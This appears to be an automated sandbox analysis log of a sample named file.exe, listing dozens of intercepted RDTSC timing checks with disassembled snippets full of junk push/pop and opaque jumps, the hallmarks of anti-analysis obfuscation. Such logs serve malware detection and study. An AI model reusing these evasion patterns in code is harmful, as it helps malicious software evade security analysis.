    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B0C6 second address: B9B0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B20F second address: B9B22D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146842h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B22D second address: B9B231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B231 second address: B9B237 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B237 second address: B9B243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007FB4CD3D7AA6h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B365 second address: B9B369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B369 second address: B9B372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9BB69 second address: B9BB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB4CD146836h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9BB73 second address: B9BBA6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB4CD3D7AA6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB4CD3D7AB6h 0x00000011 pushad 0x00000012 jmp 00007FB4CD3D7AACh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A4BA second address: B9A4F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD14683Dh 0x00000007 jmp 00007FB4CD146849h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f jnp 00007FB4CD146852h 0x00000015 pushad 0x00000016 je 00007FB4CD146836h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0803 second address: BA0813 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4CD3D7AA6h 0x00000008 jo 00007FB4CD3D7AA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0813 second address: BA0818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA09DF second address: BA09E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA09E5 second address: BA09FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB4CD146840h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA09FC second address: BA0A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0E14 second address: BA0E1E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB4CD146836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0E1E second address: BA0E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0512 second address: BA0521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0521 second address: BA053E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AB7h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1245 second address: BA126C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD14683Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007FB4CD146836h 0x00000012 jmp 00007FB4CD14683Ch 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA13D2 second address: BA13D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1857 second address: BA1860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA61CF second address: BA61E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD3D7AAFh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA61E2 second address: BA6204 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146848h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FB4CD146836h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B653F8 second address: B653FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B653FC second address: B65406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65406 second address: B6540A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6540A second address: B6540E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B658B5 second address: B658B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65979 second address: B6597F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6597F second address: B659BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FB4CD3D7AA8h 0x0000000b popad 0x0000000c xor dword ptr [esp], 660C03EEh 0x00000013 jng 00007FB4CD3D7AA7h 0x00000019 cmc 0x0000001a mov dword ptr [ebp+122D293Ch], esi 0x00000020 push FF31CC08h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FB4CD3D7AB4h 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66210 second address: B66216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66216 second address: B66268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov di, dx 0x0000000c push 0000001Eh 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FB4CD3D7AA8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 or edi, dword ptr [ebp+122D2F15h] 0x0000002e nop 0x0000002f jmp 00007FB4CD3D7AB6h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push edi 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a pop edi 0x0000003b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66357 second address: B6635C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6635C second address: B66361 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66560 second address: B66565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66565 second address: B665C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b add dword ptr [ebp+122D2F10h], esi 0x00000011 lea eax, dword ptr [ebp+1248BFF6h] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FB4CD3D7AA8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 call 00007FB4CD3D7AADh 0x00000036 jmp 00007FB4CD3D7AB1h 0x0000003b pop ecx 0x0000003c nop 0x0000003d je 00007FB4CD3D7AB2h 0x00000043 jc 00007FB4CD3D7AACh 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA547A second address: BA5480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5480 second address: BA548E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FB4CD3D7AA6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA55D4 second address: BA55DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB4CD146836h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA55DE second address: BA55FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AADh 0x00000007 jnc 00007FB4CD3D7AA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FB4CD3D7AA6h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA55FD second address: BA5614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146843h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA573D second address: BA5751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FB4CD3D7AACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA589E second address: BA58A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA58A4 second address: BA58B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA58B3 second address: BA58C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD14683Eh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA59FE second address: BA5A39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AB2h 0x00000007 jmp 00007FB4CD3D7AB9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FB4CD3D7AACh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5B72 second address: BA5B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5B78 second address: BA5B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5CDA second address: BA5CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5CDE second address: BA5CE8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5CE8 second address: BA5CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5CEE second address: BA5CF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA85EC second address: BA860E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB4CD146842h 0x00000008 jmp 00007FB4CD14683Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA860E second address: BA863B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007FB4CD3D7AA6h 0x0000000e jmp 00007FB4CD3D7AB4h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA863B second address: BA863F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA863F second address: BA8662 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB4CD3D7AA6h 0x00000008 js 00007FB4CD3D7AA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB4CD3D7AAFh 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8662 second address: BA8668 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA817E second address: BA8182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8182 second address: BA818B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA818B second address: BA8190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8190 second address: BA8196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8196 second address: BA819A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA819A second address: BA81B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB4CD14683Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0B39 second address: BB0B45 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB4CD3D7AA6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0B45 second address: BB0B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FB4CD146836h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0B52 second address: BB0B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0B5A second address: BB0B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB4CD146836h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push ebx 0x0000000f jng 00007FB4CD146836h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0C9E second address: BB0CA3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0CA3 second address: BB0CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jno 00007FB4CD146842h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FB4CD146836h 0x00000018 je 00007FB4CD146836h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0E9E second address: BB0EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0EA2 second address: BB0EBE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB4CD146836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FB4CD146836h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007FB4CD146836h 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0EBE second address: BB0EE8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4CD3D7AACh 0x00000008 jg 00007FB4CD3D7AA6h 0x0000000e pushad 0x0000000f jnp 00007FB4CD3D7AA6h 0x00000015 jmp 00007FB4CD3D7AB3h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB1178 second address: BB1181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB1181 second address: BB1186 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB1186 second address: BB11B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD146845h 0x00000009 jmp 00007FB4CD146845h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB11B6 second address: BB11E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007FB4CD3D7AA6h 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007FB4CD3D7AA6h 0x00000014 ja 00007FB4CD3D7AA6h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007FB4CD3D7AACh 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66094 second address: B66098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66098 second address: B660FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FB4CD3D7AA8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov edi, ecx 0x00000028 mov ch, F6h 0x0000002a jmp 00007FB4CD3D7AB3h 0x0000002f push 00000004h 0x00000031 mov dword ptr [ebp+12453884h], ecx 0x00000037 nop 0x00000038 js 00007FB4CD3D7ABCh 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FB4CD3D7AAEh 0x00000045 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB14DC second address: BB14F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4CD146843h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB14F5 second address: BB14F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB14F9 second address: BB14FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB209E second address: BB20B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FB4CD3D7AAFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB20B5 second address: BB20CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD14683Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB20CD second address: BB20D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB20D3 second address: BB20D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6446 second address: BB6451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FB4CD3D7AA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6813 second address: BB682F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB4CD146846h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6AE4 second address: BB6AEE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB4CD3D7AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA1D0 second address: BBA1DA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB4CD146836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA1DA second address: BBA1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA1E0 second address: BBA209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FB4CD146836h 0x00000009 jl 00007FB4CD146836h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB4CD146845h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB98E8 second address: BB98EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB98EF second address: BB9911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 jg 00007FB4CD146836h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB4CD14683Dh 0x0000001a rdtsc
